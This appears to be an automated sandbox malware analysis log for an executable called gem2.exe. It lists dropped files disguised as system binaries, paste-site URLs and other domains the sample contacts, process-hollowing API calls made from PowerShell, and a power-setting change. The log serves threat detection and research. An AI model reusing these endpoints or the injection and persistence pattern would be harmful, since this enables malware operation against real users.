Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_000001F5A968D880 FindFirstFileExW,9_2_000001F5A968D880
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54FB848 FindFirstFileExW,14_2_00007FF6A54FB848
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0A4A0 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,16_2_00000173CFC0A4A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D03BD880 FindFirstFileExW,16_2_00000173D03BD880
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B848 FindFirstFileExW,17_2_00007FF7D168B848
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A81C0 InternetCheckConnectionW,14_2_00007FF6A54A81C0
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: api.ipify.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A5440 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,14_2_00007FF6A54A5440
Source: global trafficHTTP traffic detected: GET /STB/cGFzdGVzbmFwM.txt HTTP/1.1User-Agent: URL CheckerHost: pastesnap.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /STB/cGFzdGVzbmFwM.txt HTTP/1.1User-Agent: MyUserAgentHost: pastesnap.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /STB/cGFzdGVzbmFwR.txt HTTP/1.1User-Agent: MyUserAgentHost: pastesnap.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: pastesnap.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: wavepassage.cfd
Source: global trafficDNS traffic detected: DNS query: textbinvault.com
Source: global trafficDNS traffic detected: DNS query: securetextweb.cc
Source: lsass.exe, 00000039.00000002.2551418796.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000003.2135670157.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518430800.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000000.1518269296.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2551807834.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/Kh
Source: gem2.exe, 00000000.00000003.1329691499.000002351CBED000.00000004.00000020.00020000.00000000.sdmp, gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmp, gem2.exe, 00000000.00000003.1329805123.000002351CBEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
Source: gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/
Source: gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5
Source: gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txtup
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/Windows
Source: svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/blockremoteimageloadsdevicecapabilitycamera
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://pastesnap.com/https://deepseahunter.com.de/https://projectretrac.com/https://brettdogecoin.c
Source: cmd.exe, 0000002A.00000002.1478464304.000001A9808A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/t
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://projectretrac.com/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://projectretrac.com/Hh
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://projectretrac.com/P_PROF
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://russianculturalheritage.ru/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://russianculturalheritage.ru/o
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://securetextweb.cc/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securetextweb.cc/BAT;.CM
Source: svchost.exe, 00000010.00000002.2555613530.00000173CFB71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securetextweb.cc/y
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://spokoystvieidusha.ru/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spokoystvieidusha.ru/E;.WS
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spokoystvieidusha.ru/_TIMEQ
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://syncaicloud.com/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncaicloud.com/ndows
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://textbinvault.com/
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://tiffanyonlinestore.top/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffanyonlinestore.top/Ak
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffanyonlinestore.top/H
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffanyonlinestore.top/a
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://wavepassage.cfd/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/Bkz
Source: svchost.exe, 00000010.00000002.2555613530.00000173CFB71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/NegoExtender
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/https://securetextweb.cc/80
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://wildlify.com/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wildlify.com/Java
Source: svchost.exeString found in binary or memory: https://www.openssl.org/
Source: svchost.exe, 00000010.00000002.2558519464.00000173D0113000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50437
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50558
Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50548 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50439
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50430
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50550
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50434
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50555
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50554
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50446
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50567
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50448
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50569
Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50316 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50441
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50561
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50563
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50445
Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 50617 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50595 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50629 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50275 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 50583 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50373
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50494
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50375
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50496
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50379
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50380
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50382
Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50479 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50384
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50386
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50501 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50391
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50390
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50393
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50604 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50395
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50397
Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50364 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50528 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 50539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50457 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173D0162B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext

System Summary

Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\powercfg.exe powercfg -change standby-timeout-ac 0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173CFC3B7E0 NtFlushProcessWriteBuffers
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: 17_2_00007FF7D16320A0 shared_ptr,GetModuleHandleW,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,shared_ptr,GetProcAddress,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFAAC86DF98 NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFAAC870F20 NtSetContextThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFAAC870C5D NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFAAC870FE4 NtResumeThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFAAC870A3E NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_00007FFAAC86E078 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\gem2.exe File created: C:\Windows\System32\System-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exe File created: C:\Windows\SysWOW64\$LMX-f4855f59e0.exe
Source: C:\Windows\System32\ReAgentc.exe File created: C:\Windows\Logs\ReAgent
Source: C:\Windows\System32\ReAgentc.exe File created: C:\Windows\Logs\ReAgent\ReAgent.log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_bo4wcxbo.2zy.ps1
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1875016_2_00000173CFC18750
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3AEB016_2_00000173CFC3AEB0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC386B816_2_00000173CFC386B8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC2365016_2_00000173CFC23650
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1D5A016_2_00000173CFC1D5A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1F5A016_2_00000173CFC1F5A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1ED7016_2_00000173CFC1ED70
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3EE7616_2_00000173CFC3EE76
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1C41016_2_00000173CFC1C410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC18BD016_2_00000173CFC18BD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC1B36016_2_00000173CFC1B360
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC24B6016_2_00000173CFC24B60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC3938C16_2_00000173CFC3938C
